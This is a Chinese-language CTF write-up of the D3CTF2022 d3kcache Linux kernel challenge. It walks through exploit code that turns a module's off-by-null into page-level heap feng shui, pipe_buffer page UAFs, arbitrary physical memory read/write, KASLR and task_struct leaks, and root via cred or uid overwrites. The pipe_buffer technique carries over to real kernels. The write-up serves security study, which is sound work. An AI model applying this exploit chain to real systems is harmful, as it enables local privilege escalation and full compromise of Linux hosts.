从d3cache看页级堆风水与一个off-by-null导致的任意读写

D3CTF2022-d3kcache

这题原本是记录在kernel习题记录的,但是深入理解arttnba3师傅的博客后,发现这题蕴含的知识太丰富了

于是打算单独开一篇文章,好好赏析一番

另外,arttnba3师傅tql!!!orz

保护

常规保护kaslr,kpti,smap,smep等等都是拉满的

除此之外在config中还可以看到开启了CONFIG_CFI_CLANG保护

google可以得知一下信息

This option enables Clang’s forward-edge Control Flow Integrity (CFI) checking, where the compiler injects a runtime check to each indirect function call to ensure the target is a valid function with the correct static type. This restricts possible call targets and makes it more difficult for an attacker to exploit bugs that allow the modification of stored function pointers. More information can be found from Clang’s documentation:

https://clang.llvm.org/docs/ControlFlowIntegrity.html

即选中了该选项的内核编译时,会在间接函数跳转处加入更多的检查,确保间接函数指针不被劫持

说简单点就是在发生call调用后,会在跳转目标头部做一些检查

这样一来,函数指针表将会受到严格保护,像修改函数指针虚表这样的流劫持,就很难利用了,因为不能劫持函数指针为gadget!!

模块分析

模块创建了一个obj为2048大小的slab分配器

并通过ioctl实现了常规的note增加,删除,追加和展示等功能

唯一关键的点在于追加过程中会导致一个off-by-null

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
      if ( a2 == 1300 )
{
if ( idx <= 0xFuLL && kcache_list[idx].ptr )
{
v7 = input_size;
if ( input_size > 0x800 || input_size + kcache_list[idx].size >= 0x800 )
v7 = 2048 - kcache_list[idx].size;
if ( v7 < 0 )
BUG();
v8 = (char *)kcache_list[idx].ptr + (unsigned int)kcache_list[idx].size;// append
v9 = (unsigned int)v7;
v10 = input_ptr;
_check_object_size(v8, (unsigned int)v7, 0LL);
if ( !copy_from_user(v8, v10, v9) )
{
v8[v9] = 0;//off-by-null
v5 = 0LL;
}
goto LABEL_2;
}
v25 = &unk_837;
LABEL_46:
printk(v25);
goto LABEL_2;
}

利用思路

在内核中仅有一个off-by-null漏洞似乎难以利用

不过当我们遍历那些内核pwn中常利用的结构体之后,我们可以发现pipe_buffer是一个十分适合的对象

其既可以读也可以写,而读写目标完全由其page成员决定,并且page成员就在结构体的起始处

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

我们知道struct page对应着唯一一个物理页,每个struct page的大小是0x40

那么如果我们的off-by-null漏洞刚好作用在pipe_buffer的page字段,岂不是就会使得两个pipe_buffer的page字段指向同一个struct page进而操作在同一个物理页上

不过考虑到page字段的最低处本身就有1/4的概率是\x00,所以只有3/4的概率能够成功劫持

我们暂且不考虑做到这一步的细节,继续向下思考

现在我们有了两个能够操控相同物理页的pipe,很自然的一个思路便是UAF泄露信息然后劫持结构体函数指针

但别忘了内核开启了CFI,也就是说这种方法并不适用,那在这种情况下要想提权就必须要具备一定程度的读写能力

arttnba3大佬给出了一个十分巧妙的办法,即释放其中一个pipe,让这个uaf的页继续作为pipe_buffer的slab页

此时我们可以用另一个pipe读出uaf页内部的信息,这其中就包含着完整的page指针,如果我们再拿这个page指针去覆盖uaf页上下一个pipe_buffer结构体,岂不是又构造了一次uaf

接着我们再释放这两个pipe中的一个,并再次将该页作为pipe_buffer的slab页

与上一次uaf不同的是,这一次uaf我们是知道这个uaf页的struct page*指针的,那么我们岂不是可以直接修改这个uaf页上的pipe_buffer的page指针为本uaf页的page指针

从而使得这一次uaf页上的pipe_buffer指向自身

之后多修改几个这样的指针让其互相重置岂不是可以任意读写,再提权不是十分简单

思路实现

以上理了一遍思路,现在开始分析如何实现

页级堆风水构造

此前已经学习过利用setsockopt来构造堆风水

此处不再赘述

1
2
3
~ $ cat /proc/buddyinfo 
Node 0, zone DMA 0 0 0 0 0 1 1 1 0 1
Node 0, zone DMA32 1 2 1 2 4 1 2 2 6 2

我们可以看到,内核刚启动时伙伴系统算是比较干净的

低阶的连续页较少,次数不多的setsockopt便能够清空低阶的连续页

也就是对应exp中的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/* spray pages in different size for various usages */
void prepare_pgv_pages(void)
{
/**
* We want a more clear and continuous memory there, which require us to
* make the noise less in allocating order-3 pages.
* So we pre-allocate the pages for those noisy objects there.
*/
puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
if (alloc_page(i, 0x1000, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

/* spray 8 pages for page-level heap fengshui */
puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
/* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
if (i % 19 == 0) {
free_page(pgv_4pages_start_idx++);
}

/* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
if (i % 21 == 0) {
free_page(pgv_1page_start_idx += 2);
}

/* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
if (i % 512 == 0) {
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("");
}

使得之后分配的页都是高阶拆分下来的连续页,之所以后面还要隔几个释放一个,是因为socket产生的噪声,为了尽量避免其拆散高阶连续页,所以释放之前申请的给其使用

现在面临的一个问题是

1
2
3
4
# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <li>
kcache_jar 16 16 2048 16 8 : tunables 0 0 0 : slabdata 1 0
kmalloc-cg-1k 94 160 1024 16 4 : tunables 0 0 0 : slabdata 10 0
dma-kmalloc-4k 0 0 4096 8 8 : tunables 0 0 0 : slabdata 0 0

页级堆风水要保证成功率,最好是向同一个order申请

kcache_jar所在的分配器每一次申请slab都是申请8页也就是order3

pipe_buffer默认创建16个大小是640是向kmalloc-cg-1k申请,并在耗尽时向order2申请

但要想保证较高的成功率,我们需要想办法使得二者是向同阶的order申请,kcache_jar显然没法改

pipe_buffer并不是改不了

fcntl提供了接口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg)
{
struct pipe_inode_info *pipe;
long ret;

pipe = get_pipe_info(file, false);
if (!pipe)
return -EBADF;

__pipe_lock(pipe);

switch (cmd) {
case F_SETPIPE_SZ:
ret = pipe_set_size(pipe, arg);
//...

static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
//...

ret = pipe_resize_ring(pipe, nr_slots);

//...

int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
struct pipe_buffer *bufs;
unsigned int head, tail, mask, n;

bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);

我们可以通过这个改变pipe_buffer申请obj的slab

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int extend_pipe_buffer_to_4k(int start_idx, int nr)
{
for (int i = 0; i < nr; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++);
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_fd[start_idx + i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) {
printf("[x] failed to extend %d pipe!\n", start_idx + i);
return -1;
}
}

return 0;
}

除此之外我们再选择将kcache_jar的slab夹在pipe_buffer的slab中间,以此来提高成功率

对应exp代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
void corrupting_first_level_pipe_for_page_uaf(void)
{
char buf[0x1000];

puts("[*] spray pipe_buffer...");
for (int i = 0; i < PIPE_SPRAY_NUM; i ++) {

if (pipe(pipe_fd[i]) < 0) {
printf("[x] failed to alloc %d pipe!", i);
err_exit("FAILED to create pipe!");
}
}

/* spray pipe_buffer on order-2 pages, make vul-obj slub around with that.*/

puts("[*] exetend pipe_buffer...");
if (extend_pipe_buffer_to_4k(0, PIPE_SPRAY_NUM / 2) < 0) {
err_exit("FAILED to extend pipe!");
}

puts("[*] spray vulnerable 2k obj...");
free_page(pgv_8pages_start_idx++);
for (int i = 0; i < KCACHE_NUM; i++) {
kcache_alloc(i, 8, "arttnba3");
}

puts("[*] exetend pipe_buffer...");
if (extend_pipe_buffer_to_4k(PIPE_SPRAY_NUM / 2, PIPE_SPRAY_NUM / 2) < 0) {
err_exit("FAILED to extend pipe!");
}
.......
.......
/* try to trigger cross-cache overflow */
puts("[*] trigerring cross-cache off-by-null...");
for (int i = 0; i < KCACHE_NUM; i++) {
kcache_append(i, KCACHE_SIZE - 8, buf);
}
.......
.......

至此off-by-null利用完成

第一次uaf

在上一步我们完成了off-by-null的利用

如果一切顺利,那么我们现在已经掌握了一个可以uaf的页

如何检测是否成功拿到了这个页呢

首先我们在触发off-by-null之前先向所有管道写入一些标识信息

1
2
3
4
5
6
7
8
9
puts("[*] allocating pipe pages...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8); /* prevent pipe_release() */
}

那么当off-by-null触发之后,如果我们再次遍历读取所有管道,如果一个管道发现其读取出的整型nr与当前游标i不同,那么我们就可以确认这个管道的pipe_buffer就是被off-by-null的那个

pipe[nr]是被off-by-null的那个,pipe[i]是与其重叠那个原管道

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/* checking for cross-cache overflow */
puts("[*] checking for corruption...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
char a3_str[0x10];
int nr;

memset(a3_str, '\0', sizeof(a3_str));
read(pipe_fd[i][0], a3_str, 8);
read(pipe_fd[i][0], &nr, sizeof(int));
if (!strcmp(a3_str, "arttnba3") && nr != i) {
orig_pid = nr;
victim_pid = i;
printf("\033[32m\033[1m[+] Found victim: \033[0m%d "
"\033[32m\033[1m, orig: \033[0m%d\n\n",
victim_pid, orig_pid);
break;
}
}

if (victim_pid == -1) {
err_exit("FAILED to corrupt pipe_buffer!");
}

有人可能会好奇,为什么找到了victim后就直接break了,这样不是会有可能略过orig的读取,从而导致之后的读写不一致吗

这个因为其之后的操作都是基于victim的,所以不必担心


不过还有一个疑问,就是一种极端情况

如果i=0时,就找到了victim,那么之后所有的pipe就都没进行读取,这样在第二次uaf的判断中,读取时不就会出现错误嘛

所以我个人认为可以就算找到了victim也不break,而是继续向下执行直到遍历完所有的pipe

当然其实必要性也不大,毕竟这个概率太小了,但我试了一下去除break其实确实是可行的

第二次uaf

现在我们已经有了一个可以uaf的页,并且可以读写上面的所有内容

我们首先释放这个uaf页,使其回到伙伴系统

之后再次利用fcntl修改剩余pipe_buffer的大小,使其重新分配,且刚好取出这个页作为slab

需要注意的是,因为之后还需要一次更改pipe_buffer大小,所以这次更改的大小要稍微讲究一些,即其所在slab是向order1申请内存,且objsize应该大于80,并刚好被2的幂次个pipe_buffer结构体选中作为obj

1
2
kmalloc-cg-192       504    504    192   21    1 : tunables    0    0    0 : slabdata     24   0
kmalloc-cg-96 252 252 96 42 1 : tunables 0 0 0 : slabdata 6 0

我们选中这两个作为目标

所以此次我们需要修改的大小是0x2000

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
void corrupting_second_level_pipe_for_pipe_uaf(void)
{
size_t buf[0x1000];
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ/sizeof(struct pipe_buffer));

memset(buf, '\0', sizeof(buf));

/* let the page's ptr at pipe_buffer */
write(pipe_fd[victim_pid][1], buf, SND_PIPE_BUF_SZ*2 - 24 - 3*sizeof(int));

/* free orignal pipe's page */
puts("[*] free original pipe...");
close(pipe_fd[orig_pid][0]);
close(pipe_fd[orig_pid][1]);

/* try to rehit victim page by reallocating pipe_buffer */
puts("[*] fcntl() to set the pipe_buffer on victim page...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid) {
continue;
}

if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0) {
printf("[x] failed to resize %d pipe!\n", i);
err_exit("FAILED to re-alloc pipe_buffer!");
}
}
....

在进一步解析之前先提一下pipe_buffer结构体中offsetlen两个字段的作用

offset指向未读取的数据偏移

len代表未读取得数据得长度

也就是说

  • 对一个pipe进行read操作是从offset开始的,最多读取len长度
  • 对一个pipe进行write操作是从offset+len处开始写起的

因此我们可以看到exp中有很多用于平衡读写的操作


继续exp的分析,在平衡好读写后,我们便可以读取到一个pipe_buffer的完整结构

然后我们再将其写到下一个pipe_buffer,这样我们又构造了一个uaf

之后用同样的办法找到目标管道

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/* read victim page to check whether we've successfully hit it */
read(pipe_fd[victim_pid][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
read(pipe_fd[victim_pid][0], &info_pipe_buf, sizeof(info_pipe_buf));

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

if ((size_t) info_pipe_buf.page < 0xffff000000000000
|| (size_t) info_pipe_buf.ops < 0xffffffff81000000) {
err_exit("FAILED to re-hit victim page!");
}

puts("\033[32m\033[1m[+] Successfully to hit the UAF page!\033[0m");
printf("\033[32m\033[1m[+] Got page leak:\033[0m %p\n", info_pipe_buf.page);
puts("");

/* construct a second-level page uaf */
puts("[*] construct a second-level uaf pipe page...");
info_pipe_buf.page = (struct page*) ((size_t) info_pipe_buf.page + 0x40);
write(pipe_fd[victim_pid][1], &info_pipe_buf, sizeof(info_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
int nr;

if (i == orig_pid || i == victim_pid) {
continue;
}

read(pipe_fd[i][0], &nr, sizeof(nr));
if (nr < PIPE_SPRAY_NUM && i != nr) {
snd_orig_pid = nr;
snd_vicitm_pid = i;
printf("\033[32m\033[1m[+] Found second-level victim: \033[0m%d "
"\033[32m\033[1m, orig: \033[0m%d\n",
snd_vicitm_pid, snd_orig_pid);
break;
}
}

if (snd_vicitm_pid == -1) {
err_exit("FAILED to corrupt second-level pipe_buffer!");
}

注意这一句

info_pipe_buf.page = (struct page*) ((size_t) info_pipe_buf.page + 0x40);

arttnba3大佬将page指针+0x40之后才将其写到下一个pipe_buffer

而我认为这是没有必要的,甚至加了这一句之后其实反而不太好理解了,甚至如果不是random_list的作用,还可能下一个pipe_buffer的page本身就是读出的page指针+0x40

所以这一句代码是完全可以去除的,而我在去除后编译出的exp同样利用成功了,证实了我的猜测

构建自写管道

现在我们拥有了对应第二个uaf页的struct page指针

并且还能任意写第二个uaf页上的pipe_buffer结构体

那么不是可以控制其上的pipe_buffer指向自身所在页,进而控制pipe_buffer本身

这里我们需要控制三个pipe_buffer

从低到高我们分别称作A,B,C,

其中

  • A用于任意读写
  • C负责控制A任意读写的范围,并在写完A后,向后移继续写B,使得B指向C
  • B负责将C重新指向A

获取这三个pipe_buffer的方法和前面两步差不多,就不多说了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
void building_self_writing_pipe(void)
{
size_t buf[0x1000];
size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf, 0, sizeof(buf));

/* let the page's ptr at pipe_buffer */
write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - 24 -3*sizeof(int));

/* free orignal pipe's page */
puts("[*] free second-level original pipe...");
close(pipe_fd[snd_orig_pid][0]);
close(pipe_fd[snd_orig_pid][1]);

/* try to rehit victim page by reallocating pipe_buffer */
puts("[*] fcntl() to set the pipe_buffer on second-level victim page...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid
|| i == snd_orig_pid || i == snd_vicitm_pid) {
continue;
}

if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0) {
printf("[x] failed to resize %d pipe!\n", i);
err_exit("FAILED to re-alloc pipe_buffer!");
}
}

/* let a pipe->bufs pointing to itself */
puts("[*] hijacking the 2nd pipe_buffer on page to itself...");
evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

/* check for third-level victim pipe */
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid
|| i == snd_orig_pid || i == snd_vicitm_pid) {
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page) {
self_2nd_pipe_pid = i;
printf("\033[32m\033[1m[+] Found self-writing pipe: \033[0m%d\n",
self_2nd_pipe_pid);
break;
}
}

if (self_2nd_pipe_pid == -1) {
err_exit("FAILED to build a self-writing pipe!");
}

/* overwrite the 3rd pipe_buffer to this page too */
puts("[*] hijacking the 3rd pipe_buffer on page to itself...");
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

write(pipe_fd[snd_vicitm_pid][1],buf,TRD_PIPE_BUF_SZ-sizeof(evil_pipe_buf));
write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

/* check for third-level victim pipe */
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid
|| i == snd_orig_pid || i == snd_vicitm_pid
|| i == self_2nd_pipe_pid) {
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page) {
self_3rd_pipe_pid = i;
printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
"%d\n", self_3rd_pipe_pid);
break;
}
}

if (self_3rd_pipe_pid == -1) {
err_exit("FAILED to build a self-writing pipe!");
}

/* overwrite the 4th pipe_buffer to this page too */
puts("[*] hijacking the 4th pipe_buffer on page to itself...");
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

write(pipe_fd[snd_vicitm_pid][1],buf,TRD_PIPE_BUF_SZ-sizeof(evil_pipe_buf));
write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

/* check for third-level victim pipe */
for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
if (i == orig_pid || i == victim_pid
|| i == snd_orig_pid || i == snd_vicitm_pid
|| i == self_2nd_pipe_pid || i== self_3rd_pipe_pid) {
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page) {
self_4th_pipe_pid = i;
printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
"%d\n", self_4th_pipe_pid);
break;
}
}

if (self_4th_pipe_pid == -1) {
err_exit("FAILED to build a self-writing pipe!");
}

puts("");
}

任意读写

之前已经介绍了ABC的作用,以下就是初始化准备过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void setup_evil_pipe(void)
{
/* init the initial val for 2nd,3rd and 4th pipe, for recovering only */
memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

/* hijack the 3rd pipe pointing to 4th */
evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;
}

真正的任意读写封装

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
/* page to read */
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

/* hijack the 4th pipe pointing to 2nd pipe */
write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* hijack the 2nd pipe for arbitrary read */
write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ-sizeof(evil_2nd_buf));

/* hijack the 3rd pipe to point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* read out data */
read(pipe_fd[self_2nd_pipe_pid][0], dst, 0xfff);
}
void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
/* page to write */
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

/* hijack the 4th pipe pointing to 2nd pipe */
write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* hijack the 2nd pipe for arbitrary read, 3rd pipe point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

/* hijack the 3rd pipe to point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* write data into dst page */
write(pipe_fd[self_2nd_pipe_pid][1], src, len);
}

泄露信息

我们现在已经拥有了任意读写的能力

泄露kernel text

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/**
* KASLR's granularity is 256MB, and pages of size 0x1000000 is 1GB MEM,
* so we can simply get the vmemmap_base like this in a SMALL-MEM env.
* For MEM > 1GB, we can just find the secondary_startup_64 func ptr,
* which is located on physmem_base + 0x9d000, i.e., vmemmap_base[156] page.
* If the func ptr is not there, just vmemmap_base -= 256MB and do it again.
*/
vmemmap_base = (size_t) info_pipe_buf.page & 0xfffffffff0000000;
for (;;) {
arbitrary_read_by_pipe((struct page*) (vmemmap_base + 157 * 0x40), buf);

if (buf[0] > 0xffffffff81000000 && ((buf[0] & 0xfff) == 0x070)) {
kernel_base = buf[0] - 0x070;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
"\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
kernel_base, kernel_offset);
break;
}

vmemmap_base -= 0x10000000;
}
printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

0x9d000/0x1000=157

至于开头那段注释,可能是我理解能力不够强,按照我的理解似乎是有点问题的

arttnba3大佬提到kaslr的粒度是256m,但是and pages of size 0x1000000 is 1GB MEM中的0x1000000显然不是256m,之后的代码以及just vmemmap_base -= 256MB与之都对不上


之后再在内存中搜索task结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
prctl(PR_SET_NAME, "arttnba3pwnn");

/**
* For a machine with MEM less than 256M, we can simply get the:
* page_offset_base = heap_leak & 0xfffffffff0000000;
* But that's not always accurate, espacially on a machine with MEM > 256M.
* So we need to find another way to calculate the page_offset_base.
*
* Luckily the task_struct::ptraced points to itself, so we can get the
* page_offset_base by vmmemap and current task_struct as we know the page.
*
* Note that the offset of different filed should be referred to your env.
*/
for (int i = 0; 1; i++) {
arbitrary_read_by_pipe((struct page*) (vmemmap_base + i * 0x40), buf);

comm_addr = memmem(buf, 0xf00, "arttnba3pwnn", 12);
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-57] > 0xffff888000000000) /* task->read_parent */
&& (comm_addr[-56] > 0xffff888000000000)) { /* task->parent */

/* task->read_parent */
parent_task = comm_addr[-57];

/* task_struct::ptraced */
current_task = comm_addr[-50] - 2528;

page_offset_base = (comm_addr[-50]&0xfffffffffffff000) - i * 0x1000;//直接映射区的首页
page_offset_base &= 0xfffffffff0000000;

printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
(struct page*) (vmemmap_base + i * 0x40));
printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
page_offset_base);
printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m"
"0x%lx\n\n", current_task);
break;
}
}

提权

arttnba3师傅提供了三种提权的方法,其中有两种并不常见

我们一一解读一下

修改cred

第一种是较为常见的修改当前进程的task_struct结构体,一般两种形式

  • 修改task_struct->cred&init_cred
  • 修改task_struct->cred->uid和euid0

arttnba3大佬选择的是第一种方法

由于 init_cred 的符号有的时候是不在 /proc/kallsyms 中导出的(当然这题是导出了的)

所以大佬展示了一种方法,即通过解析 task_struct 不停的向上寻找父进程,直到找到init进程,init是所有进程的父进程,且其拥有root权限,当然cred就是init_cred

将其保存并用以替换current_task的cred,以此提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
void privilege_escalation_by_task_overwrite(void)
{
/* finding the init_task, the final parent of every task */
puts("[*] Seeking for init_task...");

for (;;) {
size_t ptask_page_addr = direct_map_addr_to_page_addr(parent_task);

tsk_buf = (size_t*) ((size_t) buf + (parent_task & 0xfff));

arbitrary_read_by_pipe((struct page*) ptask_page_addr, buf);
arbitrary_read_by_pipe((struct page*) (ptask_page_addr+0x40),&buf[512]);

/* task_struct::real_parent */
if (parent_task == tsk_buf[309]) {
break;
}

parent_task = tsk_buf[309];
}

init_task = parent_task;
init_cred = tsk_buf[363];
init_nsproxy = tsk_buf[377];

printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n",init_nsproxy);

/* now, changing the current task_struct to get the full root :) */
puts("[*] Escalating ROOT privilege now...");

current_task_page = direct_map_addr_to_page_addr(current_task);

arbitrary_read_by_pipe((struct page*) current_task_page, buf);
arbitrary_read_by_pipe((struct page*) (current_task_page+0x40), &buf[512]);

tsk_buf = (size_t*) ((size_t) buf + (current_task & 0xfff));
tsk_buf[363] = init_cred;
tsk_buf[364] = init_cred;
tsk_buf[377] = init_nsproxy;

arbitrary_write_by_pipe((struct page*) current_task_page, buf, 0xff0);
arbitrary_write_by_pipe((struct page*) (current_task_page+0x40),
&buf[512], 0xff0);

puts("[+] Done.\n");
puts("[*] checking for root...");

get_root_shell();
}

然后个人自己实现了一下第二种方法,直接修改uid和euid为0,思路更直接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
printf("%llu\n",cred_page);
int offset=cred_page&0xfff;
cred_page=direct_map_addr_to_page_addr(cred_page);

/* page to write */
evil_2nd_buf.page = cred_page;
evil_2nd_buf.offset = offset+4;
evil_2nd_buf.len = 0;
char src[24];
memset(src,0,24);
int len=24;
/* hijack the 4th pipe pointing to 2nd pipe */
write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* hijack the 2nd pipe for arbitrary read, 3rd pipe point to 4th pipe */
